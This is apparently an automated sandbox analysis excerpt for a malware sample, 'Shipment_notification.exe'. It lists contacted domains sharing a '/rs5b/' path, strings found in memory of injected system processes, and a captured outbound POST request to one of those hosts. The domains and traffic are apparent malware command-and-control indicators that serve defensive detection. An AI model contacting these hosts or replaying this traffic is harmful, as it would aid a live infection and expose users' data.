          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 15:49:50 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 
74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%;
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://carcosainvest.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Mon, 20 Mar 2023 15:49:55 GMT server: LiteSpeed
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 20 Mar 2023 15:50:26 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 20 Mar 2023 15:50:29 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: control.exe, 00000004.00000002.582622308.00000000056AC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://carcosainvest.com/rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.53876.world
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.53876.world/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.amirah.cfd/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.339413260.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.577680371.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carcosainvest.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.carcosainvest.com/rs5b/
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comn
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.como.
          Source: Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comx
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.drkathleensanders.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.drkathleensanders.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emagrecarapido.store
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.emagrecarapido.store/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Shipment_notification.exe, 00000000.00000003.320681722.0000000005578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlP
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.320065711.00000000055AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Shipment_notification.exe, 00000000.00000002.336768528.0000000000C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comzana
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316084822.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315510968.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.316267483.000000000557E000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Shipment_notification.exe, 00000000.00000003.315947840.000000000557F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/b
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Shipment_notification.exe, 00000000.00000003.315344428.0000000005576000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.315357516.000000000557D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cni9
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Shipment_notification.exe, 00000000.00000003.322681699.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322630345.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322651512.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322604070.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.322780036.000000000557F000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com/rs5b/
          Source: control.exe, 00000004.00000002.582622308.0000000005388000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/Q
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/%
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space/rs5b/
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com.Y
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comz
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/Pr
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnv
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnx
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.zzxiaoyuan.com/rs5b/1
          Source: 10W12dX.4.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 10W12dX.4.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 10W12dX.4.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: control.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknown HTTP traffic detected:
            POST /rs5b/ HTTP/1.1
            Host: www.drkathleensanders.com
            Connection: close
            Content-Length: 187
            Cache-Control: no-cache
            Origin: http://www.drkathleensanders.com
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
